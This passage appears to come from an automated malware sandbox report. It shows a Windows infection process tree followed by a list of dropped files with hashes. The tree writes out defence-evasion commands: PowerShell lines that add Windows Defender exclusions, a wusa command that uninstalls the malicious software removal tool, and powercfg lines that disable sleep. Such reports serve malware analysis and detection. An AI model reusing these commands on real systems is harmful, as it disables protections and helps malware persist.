                            • Program crash
                            PID:4552
                        • C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe
                          "C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe"
                          3⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:2124
                          • C:\Windows\Temp\{D78CF13A-322B-4EC3-A278-C6E22DD42ADA}\.cr\Y87Oyyz.exe
                            "C:\Windows\Temp\{D78CF13A-322B-4EC3-A278-C6E22DD42ADA}\.cr\Y87Oyyz.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe" -burn.filehandle.attached=180 -burn.filehandle.self=188
                            4⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:2236
                            • C:\Windows\Temp\{18C64030-2FC5-4096-B354-8CD493121B87}\.ba\SplashWin.exe
                              C:\Windows\Temp\{18C64030-2FC5-4096-B354-8CD493121B87}\.ba\SplashWin.exe
                              5⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2892
                              • C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe
                                C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe
                                6⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: MapViewOfSection
                                PID:2776
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\SysWOW64\cmd.exe
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: MapViewOfSection
                                  PID:340
                                  • C:\Users\Admin\AppData\Local\Temp\Syncsign_v1.exe
                                    C:\Users\Admin\AppData\Local\Temp\Syncsign_v1.exe
                                    8⤵
                                      PID:5488
                          • C:\Users\Admin\AppData\Local\Temp\10106300101\ce4pMzk.exe
                            "C:\Users\Admin\AppData\Local\Temp\10106300101\ce4pMzk.exe"
                            3⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3368
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\CMnYnzVl\Anubis.exe""
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5336
                          • C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe
                            "C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe"
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:2316
                            • C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe
                              "C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe"
                              4⤵
                              • Executes dropped EXE
                              PID:1432
                            • C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe
                              "C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe"
                              4⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:3108
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 508
                              4⤵
                              • Program crash
                              PID:4848
                          • C:\Users\Admin\AppData\Local\Temp\10106320101\SvhQA35.exe
                            "C:\Users\Admin\AppData\Local\Temp\10106320101\SvhQA35.exe"
                            3⤵
                            • Executes dropped EXE
                            PID:5564
                            • C:\Users\Admin\AppData\Local\Temp\onefile_5564_133856778141084000\chromium.exe
                              C:\Users\Admin\AppData\Local\Temp\10106320101\SvhQA35.exe
                              4⤵
                              • Executes dropped EXE
                              PID:5840
                          • C:\Users\Admin\AppData\Local\Temp\10106330101\FvbuInU.exe
                            "C:\Users\Admin\AppData\Local\Temp\10106330101\FvbuInU.exe"
                            3⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Modifies system certificate store
                            PID:2248
                          • C:\Users\Admin\AppData\Local\Temp\10106340101\Ps7WqSx.exe
                            "C:\Users\Admin\AppData\Local\Temp\10106340101\Ps7WqSx.exe"
                            3⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:6548
                      • C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe
                        C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4648
                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4664
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                          2⤵
                            PID:4760
                            • C:\Windows\system32\wusa.exe
                              wusa /uninstall /kb:890830 /quiet /norestart
                              3⤵
                              • Drops file in Windows directory
                              PID:1356
                          • C:\Windows\system32\powercfg.exe
                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                            2⤵
                            • Power Settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4976
                          • C:\Windows\system32\powercfg.exe
                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                            2⤵
                            • Power Settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4992
                          • C:\Windows\system32\powercfg.exe
                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                            2⤵
                            • Power Settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5048
                          • C:\Windows\system32\powercfg.exe
                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                            2⤵
                            • Power Settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5088
                          • C:\Windows\system32\conhost.exe
                            C:\Windows\system32\conhost.exe
                            2⤵
                              PID:1536
                            • C:\Windows\explorer.exe
                              explorer.exe
                              2⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2268

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\ProgramData\ADBEC58072FE0B25.dat

                            Filesize

                            46KB

                            MD5

                            02d2c46697e3714e49f46b680b9a6b83

                            SHA1

                            84f98b56d49f01e9b6b76a4e21accf64fd319140

                            SHA256

                            522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

                            SHA512

                            60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

                          • C:\Temp\OjPpbvgIz.hta

                            Filesize

                            779B

                            MD5

                            39c8cd50176057af3728802964f92d49

                            SHA1

                            68fc10a10997d7ad00142fc0de393fe3500c8017

                            SHA256

                            f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

                            SHA512

                            cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                            Filesize

                            71KB

                            MD5

                            83142242e97b8953c386f988aa694e4a

                            SHA1

                            833ed12fc15b356136dcdd27c61a50f59c5c7d50

                            SHA256

                            d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

                            SHA512

                            bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9UR26M8S\soft[1]

                            Filesize

                            987KB

                            MD5

                            f49d1aaae28b92052e997480c504aa3b

                            SHA1

                            a422f6403847405cee6068f3394bb151d8591fb5

                            SHA256

                            81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0

                            SHA512

                            41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZKZ95V4R\service[1].htm

                            Filesize

                            1B

                            MD5

                            cfcd208495d565ef66e7dff9f98764da

                            SHA1

                            b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                            SHA256

                            5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                            SHA512

                            31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\activity-stream.discovery_stream.json.tmp

                            Filesize

                            26KB

                            MD5

                            bfc6d4a73bfe8c838d89e1a46eb2b1bc

                            SHA1

                            85f3e67881d5969d3ea25d05036140bef8ee16f4

                            SHA256

                            0a1b3ab2da7a0f1bc73d817031405faf259c6af16f954a3b6c5ef4f3cdd938d6

                            SHA512

                            27db3fcb77445129b68a1e9de0e527e01fa9bb2d1df8670fabc888a460b5a2173c7e5de362ac274bc38b644c225fa94299ca7a175dfa5768d3b8ce822b04b95b

                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                            Filesize

                            15KB

                            MD5

                            96c542dec016d9ec1ecc4dddfcbaac66

                            SHA1

                            6199f7648bb744efa58acf7b96fee85d938389e4

                            SHA256

                            7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                            SHA512

                            cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                          • C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe

                            Filesize

                            48KB

                            MD5

                            d39df45e0030e02f7e5035386244a523

                            SHA1

                            9ae72545a0b6004cdab34f56031dc1c8aa146cc9

                            SHA256

                            df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2

                            SHA512

                            69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

                          • C:\Users\Admin\AppData\Local\Temp\10105750101\7c581e7a04.exe

                            Filesize

                            938KB

                            MD5

                            34ce923dd4ce9e4c36f2a79f301e37e2

                            SHA1

                            653fb9c967d743e847b7da20c185745080a6868c

                            SHA256

                            c0288db674852d84861481b9159e66f9a58f304012460cdf9ee6c1f01a37956b

                            SHA512

                            c0c187a142dc1816d3357dfafcc81efc9f89a9a754e2a158f36331eee4518e57ccd7847b6250c9b84e7e0dd737a4ad144bde622c5fd622fcff485d9216acb912

                          • C:\Users\Admin\AppData\Local\Temp\10105760121\am_no.cmd

                            Filesize

                            1KB

                            MD5

                            cedac8d9ac1fbd8d4cfc76ebe20d37f9

                            SHA1

                            b0db8b540841091f32a91fd8b7abcd81d9632802

                            SHA256

                            5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b

                            SHA512

                            ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

                          • C:\Users\Admin\AppData\Local\Temp\10106150101\20b1824b6e.exe

                            Filesize

                            3.8MB

                            MD5

                            f7605fc9a28d7dec2cbee884066a34f4

                            SHA1

                            074f8f0da6eb355d4a61e65a74cbb490b4f7c1bc

                            SHA256

                            634496a27b42f3a1735986573b1376a36535d7081bf761de51e537b2ae8686ae

                            SHA512

                            bc3b573e7856a70e5a2adc0ff2766756d5c3519263b0b520267cbcbe8472743cdf053738a00ad0457e2dfe90f83fd865e6cba997b5fa2ded2080e6f2c4936c37

                          • C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe

                            Filesize

                            445KB

                            MD5

                            c83ea72877981be2d651f27b0b56efec

                            SHA1

                            8d79c3cd3d04165b5cd5c43d6f628359940709a7

                            SHA256

                            13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482

                            SHA512

                            d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

                          • C:\Users\Admin\AppData\Local\Temp\10106170101\099b641ade.exe

                            Filesize

                            4.5MB

                            MD5

                            6bdda91d3a775718db3118d910faab64

                            SHA1

                            79f565f59b7f21e19ce9b798856c78c5ee3cf2a5

                            SHA256

                            334cb0a587c3bd2c2d7771f06f69a040ac999dc7d8c59fe8b25e63487d93b90f

                            SHA512

                            f17b4a5b20ff7c4f7af55e5c381d7a95f8565bb4d131128af98ec2267381caca0193fbb37e51d95825987abfed53bbacec3a468216a1d375e0dee611f6c7b612

                          • C:\Users\Admin\AppData\Local\Temp\10106180101\AhFKwnS.exe

                            Filesize

                            1.3MB

                            MD5

                            dba9d78f396f2359f3a3058ffead3b85

                            SHA1

                            76c69c08279d2fbed4a97a116284836c164f9a8b

                            SHA256

                            ff07f07ed8d9ebf869603100b975c0e172d66e62973150e3e4b918e2faacf4b1

                            SHA512

                            6c97569c239a28b1f8be0e599fb587f19506896217650fcedc3900a066ad1ef93c5242390cec90ac3cdd921d7bdc357beb9e402a149250ef211baeaaee2a99e7

                          • C:\Users\Admin\AppData\Local\Temp\10106200101\ae09e8f5c6.exe

                            Filesize

                            1.8MB

                            MD5

                            dfbd8254f8f452c4efee8f92f623923f

                            SHA1

                            5ae96189ce5bf17bdbf2804227221ba605cffc2b

                            SHA256

                            6100c8b2a1b5b81783da1847a812af9c75849e44368cf9847eaea47e02b04699

                            SHA512

                            d7940f24817cd2c180babce402a1f532e50785c1a9a69180f57a32091eb48f7112300c2e9ed4a07e8eae60accfc82acd1d3d8b1cf4a8e7bb6549b06f58c988a4

                          • C:\Users\Admin\AppData\Local\Temp\10106210101\696151d304.exe

                            Filesize

                            3.0MB

                            MD5

                            5e0c2cf7bd029900ec4a3afa38bcb068

                            SHA1

                            251a68ef3b86e7c4031005b66d74e0874d5b6c03

                            SHA256

                            f46df9a7f5640840c89c13e9ecc9bcc33b2fba690935f6df1e87275a27f024a9

                            SHA512

                            a9316189960f596dd1f4f5c801078f58d94d6f8d94f0a24d6e1e6acdb7433fea522351e4fc9ac59798c16dbf9614a92c9628fc123d118eb4307c6fd255d75ad1

                          • C:\Users\Admin\AppData\Local\Temp\10106220101\784126e897.exe

                            Filesize

                            1.7MB

                            MD5

                            1eaae50ccebf76faab354513012be540

                            SHA1

                            11c9e9781d192c32aac160b67a50af48e8c11b18

                            SHA256

                            d47bd3f6b206c1ab8754465ae0afd173e44a9383d676df34e1e9618f25519657

                            SHA512

                            5bf2d4a2b4dbefc207bb8eb576f8bc9ecfb4b38f04dbe8c47a76ef26817a39cac02154a8b18d060ccf445681d644b5c7f16a9614cffacb0e36194844e00ef317

                          • C:\Users\Admin\AppData\Local\Temp\10106230101\1566acddfa.exe

                            Filesize

                            950KB

                            MD5

                            31701a31a3ea0750c510baf8084b8054

                            SHA1

                            2ad171cbb579f4103afedab709b8f21adb480300

                            SHA256

                            c37416eca1ff104548d11107d8c8c9cc502629741b83c132e42069db760a6d87

                            SHA512

                            bb5dbaeeaa51652fdce26097942d363cb4bbcb10b42d1e200cc05ff78e2ad414305c85d50dd7805f6a91116ca34b440af65944f4a601ef238fa2536e017bc516

                          • C:\Users\Admin\AppData\Local\Temp\10106240101\f8860f532a.exe

                            Filesize

                            1.7MB

                            MD5

                            bcda678e76a1f36a44a93e5f0cddc418

                            SHA1

                            7a15a7d5b33fd87edcda14815ca6130f527f6de9

                            SHA256

                            13f9ef51100d5fc3d9f388f7c224347970df1461cc4f0db8c343446c3b8edefd

                            SHA512

                            9045cc0169b0a75d9e0e81477459afa45197c2098d001e5561f1e0a900b957826e7a59f91ef7d4551fa27ad0342458a74cf4a1b98e43a14f0e69f8ab22b399f7

                          • C:\Users\Admin\AppData\Local\Temp\10106260101\v6Oqdnc.exe

                            Filesize

                            2.0MB

                            MD5

                            6006ae409307acc35ca6d0926b0f8685

                            SHA1

                            abd6c5a44730270ae9f2fce698c0f5d2594eac2f

                            SHA256

                            a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b

                            SHA512

                            b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

                          • C:\Users\Admin\AppData\Local\Temp\10106270101\OEHBOHk.exe

                            Filesize

                            5.0MB

                            MD5

                            ddab071e77da2ca4467af043578d080c

                            SHA1

                            226518a5064c147323482ac8db8479efd4c074f8

                            SHA256

                            d3271bc7c315bd03e070cc2048c0349a73ecd858df500f2a2e2f09d606dfe79c

                            SHA512

                            e3dc210bef348b324c9a00e32648b50a6cd0f078eefa436b201afd10853b648654de3fd993a1cea9d1aa4e7dde6587de1c1f8c09e09af7c62dde8536fd43d6d8

                          • C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe

                            Filesize

                            415KB

                            MD5

                            641525fe17d5e9d483988eff400ad129

                            SHA1

                            8104fa08cfcc9066df3d16bfa1ebe119668c9097

                            SHA256

                            7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a

                            SHA512

                            ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

                          • C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe

                            Filesize

                            5.7MB

                            MD5

                            5fb40d81dac830b3958703aa33953f4f

                            SHA1

                            8f4689497df5c88683299182b8b888046f38c86a

                            SHA256

                            b2395af2b5497ded848bfffc2192747510420b0a7bab9897322aed765c66d9dc

                            SHA512

                            80b400bb79c4cbed1fb35af0fae1b88b399d679f7c99c625214082d143f51d381436abb27284b0205bdacf38cafa742a32c46ce8136ad7684d566d2e19bfab8e

                          • C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe

                            Filesize

                            350KB

                            MD5

                            b60779fb424958088a559fdfd6f535c2

                            SHA1

                            bcea427b20d2f55c6372772668c1d6818c7328c9

                            SHA256

                            098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221

                            SHA512

                            c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

                          • C:\Users\Admin\AppData\Local\Temp\10106320101\SvhQA35.exe

                            Filesize

                            11.5MB

                            MD5

                            9da08b49cdcc4a84b4a722d1006c2af8

                            SHA1

                            7b5af0630b89bd2a19ae32aea30343330ca3a9eb

                            SHA256

                            215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd

                            SHA512

                            579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb

                          • C:\Users\Admin\AppData\Local\Temp\10106330101\FvbuInU.exe

                            Filesize

                            1.8MB

                            MD5

                            f155a51c9042254e5e3d7734cd1c3ab0

                            SHA1

                            9d6da9f8155b47bdba186be81fb5e9f3fae00ccf

                            SHA256

                            560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af

                            SHA512

                            67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

                          • C:\Users\Admin\AppData\Local\Temp\10106340101\Ps7WqSx.exe

                            Filesize

                            6.8MB

                            MD5

                            dab2bc3868e73dd0aab2a5b4853d9583

                            SHA1

                            3dadfc676570fc26fc2406d948f7a6d4834a6e2c

                            SHA256

                            388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb

                            SHA512

                            3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

                          • C:\Users\Admin\AppData\Local\Temp\TarC1A1.tmp

                            Filesize

                            183KB

                            MD5

                            109cab5505f5e065b63d01361467a83b

                            SHA1

                            4ed78955b9272a9ed689b51bf2bf4a86a25e53fc

                            SHA256

                            ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673

                            SHA512

                            753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

                          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

                            Filesize

                            1.8MB

                            MD5

                            6b38db8d1cadb7a58f0bd9f9d281646a

                            SHA1

                            f56be70672c257dc68cfb0b9a0781569070b122b

                            SHA256

                            899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1

                            SHA512

                            6ac8fbbd65da962674112f1ec89fe62c9ceb470e9c6fb7fdd9f1654d8f501b71bc6409fd08b43d8f38d2229ce1964bcbc14ae7ccbad0613a51943d9631fe20ca

                          • C:\Users\Admin\AppData\Local\Temp\ta6OjYcFr.hta

                            Filesize

                            717B

                            MD5

                            1af1985b5de456fb1f797b00e2a0b9a1

                            SHA1

                            aa0ac5cd0fe2dff45e3fa6db916f8c150499710e

                            SHA256

                            27fffec709d30cdea25d70dbfda35b07ec704a5f272b798a1f07a3773bbbd794

                            SHA512

                            fe2c346c28992100582aea148883e44a8760e897b850b317e2b4777547f81d4fd692fcdf1e2cf4fe1a09814dbe0436e7c23a8dbd17e6cd5f36017775d2b934d8

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                            Filesize

                            7KB

                            MD5

                            f8fe64b27e595bcce7f5d5ac797331fd

                            SHA1

                            003acaa46a24323fcf2ce7041c5d0daee0cf2f73

                            SHA256

                            c6da668da9af22d4022e2996c98d595b9de2bf4979603438766fb5a876ec5b41

                            SHA512

                            097839e2a7c62257f98a8e85dedc1c34eac2e92ce3386521287ac3e8e32ffc653b16379c0576b7134dd2347f3cb61d032ecc30aa4deb2f498be5ad31c438537d

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\datareporting\glean\db\data.safe.bin

                            Filesize

                            2KB

                            MD5

                            cbf194c6e3f00e5b78a8d7531c96d5b5

                            SHA1

                            b5f3921b1bf663f181eb7a67f8937ebcdc515218

                            SHA256

                            be810ca9ceec15a96bf235ecc9eefbf24610ea2773dd336bc81b8eefa878eebc

                            SHA512

                            6dc03c8335c30c9ca483fe701bd93b77179b72a0ebd22a537820b83bb73a0798ecb1c0689eb810ed6d9720ac8d8fe8836bb24eb06fb47044f9c633db5c24169c

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\datareporting\glean\pending_pings\766897c1-5c78-4e8f-8a77-c7a5021a1ada

                            Filesize

                            12KB

                            MD5

                            961b961e0bef9c8685d5977ce8eb2a6b

                            SHA1

                            b86bca5244849c3d4b65a6d78ea9b2dc267146e4

                            SHA256

                            4cfd82d6ed18ace98429bea9636b4757b75dd1dbf642bc4da6af7d581cd5d05c

                            SHA512

                            dc78369168bd5885178543929533d35f21d6b2c7b88249a6d3caca31d5c79830c0efbd930bde4eca79a0f782ca27b1e5553deda9424f0a647bf57c0db82a6af6

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\datareporting\glean\pending_pings\faf1331e-36fa-4988-91c1-c92553ca2b45

                            Filesize

                            745B

                            MD5

                            ce5cb916d0ddd35bc75c8e8412a7d411

                            SHA1

                            9aab9b7bf72c99c396f1fb342d1cc1604a009b94

                            SHA256

                            08987921fbf2ce06a5db3a7ec0ed052e9bdd6a8858f9298a84c6914c271bb625

                            SHA512

                            c38c4bb0af709ee230088cf1d9ba5fd42dcde995cd3e71a2d8b332dd0255e7d910c5968b4e36dc1d3c3fa2664958d5ca8169c6cbc3b052012aadea4d2d9f7497

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\prefs-1.js

                            Filesize

                            6KB

                            MD5

                            eff28baaf3ff2fee4e0663dba33197e1

                            SHA1

                            2592a66d01b7257098295dca32ee090f05ffedac

                            SHA256

                            61e20213ddd3d05b8186397b569b93b0a0b979bc82f73a6fd58ffc0327eac228

                            SHA512

                            2848c8f7c884d4f9715b326e52137042301d30fa7962c7715605ed724cb6f952c5ed17d41d773f19b14c8209bbf992e6df7ec7b01536dd1de24a5dca70eff4e9

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\prefs.js

                            Filesize

                            6KB

                            MD5

                            cead319f2dc00f71f36b22a56a22e1a5

                            SHA1

                            cbfd846c143c55f146006e7ba1d5f932bc2c4786

                            SHA256

                            678c6606161a30f6acfd9023146567ffcb4b1d6c2641f22d10856aab726ad04d

                            SHA512

                            bf02232ad3f45b722737b0321b047df8341ce95d73fef3b2d6dd7da3f71f98339028ecd6edfe0e0e71834dfdb748494c4a657703ee569ae00dff2c2f36359ab1

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\prefs.js

                            Filesize

                            6KB

                            MD5

                            91b28cec21074dcc2b7b7c89f3976562

                            SHA1

                            2679e015aa2bfe49cb45835e863035729e5f068c

                            SHA256

                            9e5385473081fa7f2c164d166f57aec41f4950003dbfb5480d575ab98e0c8c6d

                            SHA512

                            2e58cdbd1e0b81357bed554ba4641edc86aff3e2748d494aad4fd310788be450e1656b15907d77f1b1025576db12e5410ae434d71798fcbd6c987222a5abcc81

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\sessionstore-backups\recovery.jsonlz4

                            Filesize

                            4KB

                            MD5

                            ddc8b71c39d17788d32a49e6fd3c09a8

                            SHA1

                            0a6fea349bc38b762ca1f507c48dd5bfb1e5d197

                            SHA256

                            7adbf29f8a10aee57707dc46c6ee2fb8740f5a4564c9c6b31658fd713a7f96bc

                            SHA512

                            3797dbcd5b525c7534fc18f91e82098a07707322c9c448d37176f8b2943723817dfb39d6b25e6260e5018c5b79ee3e2fe937046c8296a25b5e4561823d6d3df7

                          • C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe

                            Filesize

                            446KB

                            MD5

                            4d20b83562eec3660e45027ad56fb444

                            SHA1

                            ff6134c34500a8f8e5881e6a34263e5796f83667

                            SHA256

                            c5e650b331fa5292872fdaede3a75c8167a0f1280ce0cd3d58b880d23854bdb1

                            SHA512

                            718bd66fcff80b8008a4523d88bd726cdbc95e6e7bdb3f50e337e291294505ed54e6f5995d431968b85415e96f6f7ed37381ca021401ad57fda3b08a1f0c27f4

                          • \Users\Admin\AppData\Local\TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE

                            Filesize

                            1.8MB

                            MD5

                            1ea9e7e7393e3bfdc50d8c613c1a7fb4

                            SHA1

                            79f3c21fb6de90dae7005202e69d71d0bef96028

                            SHA256

                            a5265bc009169c9d16c5571064b12e00428f1bb59bcd59f402ee90b5caa8b10a

                            SHA512

                            e20db7f8206a4a822bcdea638c2227fa7b2dd54f99d57ca77ef6a19fc7c6b1637e01423c29eb49a3f1be2efa79bbb976a80b3be50f858ba7766d27afc856713c

                          • memory/296-178-0x0000000000400000-0x0000000000465000-memory.dmp

                            Filesize

                            404KB

                          • memory/296-180-0x0000000000400000-0x0000000000465000-memory.dmp

                            Filesize

                            404KB

                          • memory/296-175-0x0000000000400000-0x0000000000465000-memory.dmp

                            Filesize

                            404KB

                          • memory/296-173-0x0000000000400000-0x0000000000465000-memory.dmp

                            Filesize

                            404KB

                          • memory/296-171-0x0000000000400000-0x0000000000465000-memory.dmp

                            Filesize

                            404KB

                          • memory/296-168-0x0000000000400000-0x0000000000465000-memory.dmp

                            Filesize

                            404KB

                          • memory/296-169-0x0000000000400000-0x0000000000465000-memory.dmp

                            Filesize

                            404KB

                          • memory/296-177-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                            Filesize

                            4KB

                          • memory/772-65-0x0000000006430000-0x00000000068F6000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/772-64-0x0000000006430000-0x00000000068F6000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/920-1888-0x0000000000200000-0x000000000066A000-memory.dmp

                            Filesize

                            4.4MB

